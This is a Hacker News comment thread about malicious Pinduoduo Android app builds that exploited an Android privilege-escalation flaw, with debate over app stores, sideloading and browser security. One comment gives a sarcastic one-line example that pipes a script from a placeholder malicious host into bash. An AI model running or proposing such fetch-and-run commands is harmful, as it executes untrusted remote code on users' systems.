[HN Gopher] Android app from China executed 0-day exploit on mil...
___________________________________________________________________
Android app from China executed 0-day exploit on millions of
devices
Author : LinuxBender
Score : 189 points
Date : 2023-03-28 12:54 UTC (10 hours ago)
(HTM) web link (arstechnica.com)
(TXT) w3m dump (arstechnica.com)
| hospitalJail wrote:
| Maybe because I'm from a different era, but installing anything
| on a device from a website is an extremely risky game. There is a
| reason we moved toward using a web browser to do functionality
| that was typically done on desktop.
|
| I'm not one to worship Google's walled garden(which is just
| marketing jargon), but at least that has some layer of
| verification and malware detection.
|
| I still dream of a web app based future. Then we only need to
| security proof 1 app.
| hulitu wrote:
| > Maybe because I'm from a different era, but installing
| anything on a device from a website is an extremely risky game
|
| You are (just like me) from a different era. /s
|
| I was trying to compile rust (for mozilla) and I was shocked to
| see that it connects to the internet during the build process
| to download crates (I presume these are some kind of
| libraries). Then you have js with npm and the menu is served.
|
| Even if the web browser has a container, this can be
| compromised during the build process.
| kelnos wrote:
| Which era is that, though? There was a decently-long stretch of
| time between shrink-wrap software being common (I think my last
| boxed software purchase was probably in the late 90s), and the
| advent of the App Store (2008). During that time, downloading
| things from a website was the primary method of installing
| software.
|
| Also, it's not like people were installing this app from a
| random sketchy website; it appears to have been available on
| third-party Android app stores, which are the only option in
| China, since the Google Play Store isn't allowed there.
|
| > _I still dream of a web app based future._
|
| Right there with you, but sadly, I don't think it's a realistic
| hope.
| SoftTalker wrote:
| > installing anything on a device from a website is an
| extremely risky game
|
| curl https://malicious.example.com/useful_thing | bash
|
| and its variants?
| jeroenhd wrote:
| With the capabilities web apps have gathered over the years, I
| don't feel very comfortable with using random web apps either.
| As an added downside, random blog posts and ad iframes can now
| try to access the same APIs real web apps can. The more we move
| to a web app based reality, the more we're going to see
| exploitation of browsers and their many features.
|
| We'll never get our one security proof app because security
| proof apps can't do things like rendering and file manipulation
| at acceptable speeds.
|
| Downloading apps from websites is almost always a red flag in
| my opinion. If an app can't be in Google's app store for
| whatever reason, it surely can appear in another.
|
| The only APKs I've downloaded come from GitHub/GitLab because
| open source apps aren't always on F-Droid, and APKmirror
| because my phone is rooted _, and I consider myself to be a
| power user. I'm really surprised an app like this is popular
| enough to get downloaded installs at all, though perhaps the
| Chinese app ecosystem is different enough that I simply can't
| understand.
|
| I'd hate to have to resort to web apps for absolutely
| everything on my phone. Messengers and such need optimisations
| for battery usage and resources and browsers don't offer any of
| that. The overhead of web applications is also quite
| significant. Don't get me wrong, I use several web apps for
| small things like weather sites and a simple game here or
| there, but there has to be room for both or the mobile
| experience will get worse for everyone.
|
| _ therefore I can't download Netflix from Google Play for some
| absolutely idiotic reason even though the stupid app works
| perfectly afterwards. They just hate me for wanting to sync my
| clipboard automatically, I'm guessing.
| blendergeek wrote:
| > I'm really surprised an app like this is popular enough to
| get downloaded installs at all, though perhaps the Chinese
| app ecosystem is different enough that I simply can't
| understand.
|
| From the article:
|
| > The malicious versions of the Pinduoduo app were available
| in third-party markets, which users in China and elsewhere
| rely on because the official Google Play market is off-limits
| or not easy to access.
| kelnos wrote:
| > _The more we move to a web app based reality, the more
| we're going to see exploitation of browsers and their many
| features._
|
| True, but as the GP pointed out, we only have to secure one
| app, and fixing a security issue in it saves you from anyone
| exploiting that flaw in any other app.
|
| Sure, you can make the same argument of an OS-level flaw, but
| that leaves people with older devices out in the cold, as
| they often don't receive OS updates anymore. The browser is
| just an app, and as long as it supports the OS running on the
| older devices, you get those updates years after your device
| vendor stopped supporting you.
|
| We're never going to solve all security issues (at least not
| until "perfect" AI starts writing our software), but I'd much
| rather run apps in a browser than on the device directly,
| even with Android/iOS's app sandboxing tech.
| rhn_mk1 wrote:
| That's like saying "in a native-based future we only need to
| security proof the OS". There's no free lunch, you always need
| to check both the sandbox layer and the application.
| jeswin wrote:
| Browsers have a truly remarkable track record when it comes
| to security. We have been able to run untrusted code for
| nearly two decades now without a large scale breach.
| mavhc wrote:
| Even since they banned plugins
| hulitu wrote:
| > We have been able to run untrusted code for nearly two
| decades now without a large scale breach
|
| None that we know of. Keep in mind that not so long ago the
| browser did not have access to the filesystem except to save
| files. Now the browsers have access to the filesystem, camera,
| microphone, they can act as servers, they have access to USB
| devices.
|
| I mean WTF. What kind of security is that?
| rhn_mk1 wrote:
| That's because browsers don't do all that much compared to
| an operating system (although they are catching up). On the
| other side, since Windows XP, security of the OSes has been
| steadily improving as well. What breaches do you mean
| anyway?
|
| Once you push broad access to user data and hardware to
| browsers, you'll get ransomware there, too. Meanwhile,
| native sandboxing keeps advancing.
|
| So no, web will not remain the safer option forever.
| [deleted]
| 2OEH8eoCRo0 wrote:
| https://www.bleepingcomputer.com/news/security/android-malwa...
|
| > A new set of Android malware, phishing, and adware apps have
| infiltrated the Google Play store, tricking over two million
| people into installing them.
|
| https://lifehacker.com/great-now-the-apple-app-store-has-mal...
|
| > Security researchers found malware in several popular App
| Store apps.
| kccqzy wrote:
| GP said it has some layer of protection against malware, not that
| it has 100% protection. And yes in my own experience Google
| Play Protect has successfully caught malware. The goal is to
| provide some better-than-zero protection.
| 2OEH8eoCRo0 wrote:
| But is it better than going to the developer website that
| uses SSL and downloading directly? A consolidated app store
| is a single point of failure after all. Hard to say it's
| actually better. There's also no need to bundle the malware
| scanner with the app store since all it does is scan your
| device. You can have a malware scanner without an app
| store.
| kccqzy wrote:
| Huh you are right: I just found that Google Play Protect
| does support scanning apps not downloaded from the Play
| Store.
| tomComb wrote:
| I don't think he was suggesting that walled garden is perfect
| in this regard, but that it is much safer than bypassing it,
| so instances such as you list don't really refute his point
| (assuming that was your intention).
| sct202 wrote:
| Temu (Pinduoduo's American app) appears to be unaffected and is
| still #1 on the app store and even has an "Editors Choice" badge,
| but with their parent company risking reputational harm on their
| main app I would be cautious.
| pavon wrote:
| Google should block all of their app signing keys, and only
| allow new ones when PDD can explain how malicious software was
| signed with the previous ones.
| superb-owl wrote:
| As much as I hate the monopolistic nature of the app stores, this
| is why they're a good thing.
| akira2501 wrote:
| I have a computer in my pocket that I don't fully control, own,
| or operate.
|
| The actual monopoly they enjoy or the remote control of my
| devices aren't the real solutions to this problem.
| asplake wrote:
| Or: Why app stores are a thing
| cubefox wrote:
| App stores extract an absurd amount of money (30%) from the app
| ecosystem. This is not worth the slight increase in security.
| scottyah wrote:
| Maybe not for developers, but for users it is
| cubefox wrote:
| Users on average also have to pay part of the app store fee
| since some form of the cost will be handed down, e.g. more
| expensive apps / lower-quality apps.
| kernal wrote:
| These fake apps were signed with the signing key of the official
| PinDuoDuo app. Until PinDuoDuo can explain how this signing key
| was "stolen" they are to blame for creating this malware.
| RobotToaster wrote:
| It's interesting how the headline writer chose to include "from
| China". If the developer had been French or American, would they
| have included "from France", or "from America"?
| tyrfing wrote:
| It's a company with 750M MAU, so very large but still not
| something most US readers would be aware of. If it was a French
| or US developer, they would have just used the name of it.
| PakG1 wrote:
| From the article: _The malicious versions of the Pinduoduo app
| were available in third-party markets, which users in China and
| elsewhere rely on because the official Google Play market is
| off-limits or not easy to access. No malicious versions were
| found in Play or Apple's App Store. Last Monday, TechCrunch
| reported that Pinduoduo was pulled from Play after Google
| discovered a malicious version of the app available elsewhere.
| TechCrunch reported the malicious apps available in third-party
| markets exploited several zero-days, vulnerabilities that are
| known or exploited before a vendor has a patch available._
|
| As far as I know, China is the only country that has 3rd-party
| Android app markets of that size because Google Play is
| literally not allowed there. So I don't think this would be a
| significant story anywhere else in the world.
| [deleted]
| fulafel wrote:
| The EvilParcel saga seems quite tragic. You would think after the
| first few repeats they would have taken some stronger measures
| than patch up the new API misuse case of the day.
| rfoo wrote:
| Previous discussion:
| https://news.ycombinator.com/item?id=35269347
| eekfuh wrote:
| Not to be pedantic but it's not a 0-day when the patch for the
| vuln was released before exploit was executed.
| jgalt212 wrote:
| You're right, I think it was a 14-day.
|
| > Google patched in updates that became available to end users
| two weeks ago.
| jcul wrote:
| Though it says it was exploited before Google's disclosure
| (not sure if disclosure is referring to the timing of the
| patch, but the linked Google post is from 6th March).
|
| > This privilege-escalation flaw, which was exploited prior
| to Google's disclosure
| pavon wrote:
| From the article:
|
| > Lookout's forensic analysis of two Pinduoduo APK app samples
| released prior to March 5 ... has determined that both contain
| malicious code that exploits CVE-2023-20963, the Android
| privilege-escalation vulnerability that wouldn't become public
| until March 6 and wouldn't be patched in user devices for up to
| two weeks later.
| yorwba wrote:
| Previous submission on the same topic:
| https://news.ycombinator.com/item?id=35269347 (krebsonsecurity,
| 38 comments)
| [deleted]
| prox wrote:
| Anyone from China or informed enough can chip in how secure the
| marketplace is? How often does this happen? I had my own problems
| with a Chinese developed app I needed to add some content for a
| client.
| HeavenFox wrote:
| Chinese apps, even those from big established players, are often
| indistinguishable from malware. Off the top of my head, I can
| think of:
|
| - Hiding their app icon from the launcher, but adding a widget
| that looks the same. So if the user tries to uninstall the app,
| they just delete the widget and the app remains.
|
| - One app would install other apps from the same company in the
| background without user consent.
|
| - Multiple apps will wake each other so they always stay in the
| background and become impossible to kill
|
| - Requesting every permission under the sun and transmitting as
| much info to the mothership as possible
|
| - Secretly turning on the camera and filming their users
|
| However, these only happen on the Android version. The iOS
| version never has these issues.
|
| So even though I am not a fan of the Apple monopoly, I am really
| really afraid that by allowing third party app stores and
| sideloading, the western apps will race to the bottom and become
| just like this.
|
| ("But you can always download from the official App Store!" you
| may say. But what if, say, Tik Tok announces they will from now
| on leave the App Store and be available only via direct download?)
| alex7734 wrote:
| > ("But you can always download from the official App Store!"
| you may say. But what if, say, Tik Tok announces they will from
| now on leave the App Store and be available only via direct
| download?)
|
| Personal freedom always has personal responsibility attached.
| If you direct download it and it's malicious, well, that's your
| own problem. Probably should've thought about it better.
|
| If you don't want to think about security, all you have to do
| is only install apps that are in the app store. Why should
| everyone else be restricted from doing whatever they want with
| their phones?
| otterley wrote:
| > iOS version never have these issues
|
| The security argument for the App Store has never been
| stronger.
|
| > "But you can always download from the official App Store!"
| you may say. But what if, say, Tik Tok announces they will from
| now on leave the App Store and be available only via direct
| download?
|
| ... and nothing of value was lost.
| andersa wrote:
| This makes no sense. It's an argument for proper security
| controls and permissions setup on the OS level, not an app
| store.
| manuelabeledo wrote:
| > The security argument for the App Store has never been
| stronger.
|
| Is this _really_ what we want?
|
| Because if so, what is the difference between a clamped down
| App Store with arbitrary rules, and what China does with
| their Great Firewall?
| pknomad wrote:
| Yes.
|
| It's going to be an unpopular opinion but there's an awful
| lot of applications that are out there that are just
| hilariously outdated, terribly made, or are some form of
| malware. I mostly use mainstream apps (Google Maps,
| Bitwarden, Safari, Slack, Discord, Spotify, Canary, etc)
| and the times I do look for new apps I enjoy having the
| convenience of not having to sift through awful apps that used
| to plague the Android Market (and to a certain extent Google
| Play Store).
|
| App Store is not perfect by any means but I think it's
| superior to alternatives that are out there for users like
| me.
| simmerup wrote:
| Every industry is regulated, it's coming for software and
| it will help the common user from being exploited.
|
| Do you see the legislation for broadcasting and say, 'What
| makes that different from how you have no free speech in
| China?!'
|
| We've already had voluntary step backs in the idea of
| online liberalism with Twitter having to be heavily
| pressured to take down ISIS propaganda. Codifying those
| rules for everyone is inevitable.
| dec0dedab0de wrote:
| _what is the difference between a clamped down App Store
| with arbitrary rules, and what China does with their Great
| Firewall?_
|
| With a locked down App Store in America you have an option
| of using another device, or just using a computer, without
| any repercussion. With the Chinese Great Firewall, working
| around it can lead to legal troubles, to put it lightly.
| raincole wrote:
| ... you know you can buy an Android phone, if that's what
| you want, right?
|
| You can't get an ISP without Great Firewall in China. If
| you try to found such an ISP you'll be in jail.
| kelnos wrote:
| > _The security argument for the App Store has never been
| stronger._
|
| Perhaps, for many users this is true. But I don't need or
| want a nanny-company telling me what I can and can't install
| on my devices.
|
| (And yes, I do sideload apps -- including one I've written
| myself -- on my Android phone. So this isn't a theoretical
| "don't take my freedom" type concern.)
|
| >> _But what if, say, Tik Tok announces they will from now on
| leave the App Store and be available only via direct download?_
|
| > _... and nothing of value was lost._
|
| Couldn't agree more with that sentiment. The problem is,
| though, that many people will still download it from TikTok's
| own website or app store. Security is a collective problem:
| even if I manage to avoid malware, a friend or colleague --
| who may have email or chat or whatever history with me --
| could get hacked, and that would still leak some of _my_
| data.
| gretch wrote:
| > Perhaps, for many users this is true. But I don't need or
| want a nanny-company telling me what I can and can't
| install on my devices.
|
| 100% agree. Simply don't buy an Apple phone.
| jxramos wrote:
| This has been a recent consideration of mine I haven't
| fully explored or thought how to deal with yet. I now look
| at new friends with suspicion, especially those who are not
| tech savvy. I just gave out an email to a friend recently
| and he forwarded me an email list without BCC revealing all
| the recipients. I thought to myself, "oh boy somewhere down
| the road I'm going to be getting hacked email messages from
| one of these individuals."
| smm11 wrote:
| Tiktok, tick, tick, tick.
| screamingninja wrote:
| From en.pinduoduo.com:
|
| > Pinduoduo's core value is "Ben Fen" (Ben Fen). It is difficult
| to express it perfectly in English, but it essentially means to
| adhere firmly to one's own duties and principles. There are
| several layers of meaning here:
|
| > Be honest and trustworthy;
|
| > Discharge our own duties and responsibilities regardless of
| others' conduct;
|
| > Never take advantage of others even when we are in a position
| to do so;
|
| > Self-reflect and take responsibilities when problems arise
| instead of blaming others.
|
| I guess the company's app developers never got the memo.
| jonatron wrote:
| I was wondering why PinDuoDuo were hiring for "Android Reverse
| Engineer". Screenshot of translated job page:
| https://github.com/jonatron/randomstuff/blob/main/Screenshot...
|
| Edit: Replaced imgur link
| chatmasta wrote:
| To be fair, there are plenty of legitimate reasons to hire a
| reverse engineer. Maybe you're building a red team to your
| AppSec blue team, or you want to analyze the apps of your
| competitors, or any apps at the top of the App Store (you'd be
| shocked at the dark patterns you can uncover by looking at
| newly trending apps).
| tester457 wrote:
| Dark patterns like what?
| cubefox wrote:
| (Off topic, but does someone know a good alternative to imgur?
| The website currently autoplays unrelated videos, freezes my
| mobile browser for several seconds, and appears to hijack the
| back button. It feels like malware.)
| doodlesdev wrote:
| If you are the one linking you can just grab the URL for the
| image file directly. If opening the website to do that is
| your problem... good luck I guess Lol
| jonatron wrote:
| I linked the image file url, but checking on my phone, it
| redirects to the bloated page instead of the image. Loaded
| just the image on my desktop though.
| thatguy0900 wrote:
| On mobile they also default to serving resolutions that
| are completely unusable a lot of the time. I find myself
| going to desktop mode for anything with text on it.
| cubefox wrote:
| Ah yes, that's another major problem. I couldn't see
| anything on the screenshot. So far I always assumed the
| poster uploaded the wrong resolution.
| miyuru wrote:
| You can link the image without the "i" subdomain and it
| will redirect to the direct image.
|
| eg: https://imgur.com/4clqUdj.jpg (picture of a cat)
|
| Since the traffic appears to come from the main domain to
| them, it does not redirect back to the HTML page.
| CaptainNegative wrote:
| This is what showed up for me: https://cdn.discordapp.com/attachments/519791942654230528/10...
| cubefox wrote:
| Yeah, they redirect to that website which has all these
| issues. The back button hijacking (it doesn't work on
| that site in Chrome) is the most annoying one.
| cubefox wrote:
| I just remembered a good image upload service:
| https://abload.de/
|
| It has been online since 2006, does no obviously evil browser
| stuff, and the guy hosting it seems cool.
| robgibbons wrote:
| I just had to close the tab myself.
| nouryqt wrote:
| I like https://catbox.moe. Works with ShareX and has a few
| tools like a browser extension for right-click upload context.
| https://catbox.moe/tools.php
| causality0 wrote:
| With the caveat that you should fully expect catbox.moe to
| be added to your organization's blacklist if it hasn't been
| already. It's kind of the premier service for sharing
| content that falls into the "legally grey but no big
| service will ever let you keep it on their site" content
| like mass shooting videos, etc. Just don't get used to
| relying on it at work is all I'm saying.
| chatmasta wrote:
| As a general rule of thumb, if I've seen a URL shared on
| 4chan, I assume it's either a honeypot or a service people
| will judge me for associating with. I also avoid clicking
| such a URL because it's the kind of place I'd expect to
| find a zero day WebKit exploit.
| password4321 wrote:
| Drop your image into a comment on a GitHub issue, switch to
| preview and copy the link.
|
| Sort of like using Twitter as a URL shortener.
|
| Do not recommend abusing this.
| Workaccount2 wrote:
| It's too much of a hassle with NoScript too. At least 12
| domains trying to run js and allowing just imgur still
| doesn't load the image. Ridiculous that you even need js to
| view an image anyway.
| nouryqt wrote:
| On a laptop/PC you could give the rimgo[0] frontend a try
| for simple viewing, no uploading or interacting. It's by no
| means perfect but works really well in combination with the
| LibRedirect[1] browser extension.
|
| Rimgo is basically a frontend for imgur that you can
| self-host (or use a public instance). The LibRedirect
| browser extension automatically replaces the imgur.com URL
| with the specified rimgo instance.
|
| So for example https://imgur.com/gallery/eMKxD6t turns into
| https://rimgo.pussthecat.org/gallery/eMKxD6t.
|
| [0] https://codeberg.org/elttil/rimgo
|
| [1] https://github.com/libredirect/libredirect
| Workaccount2 wrote:
| This is great, thanks!
___________________________________________________________________
(page generated 2023-03-28 23:01 UTC)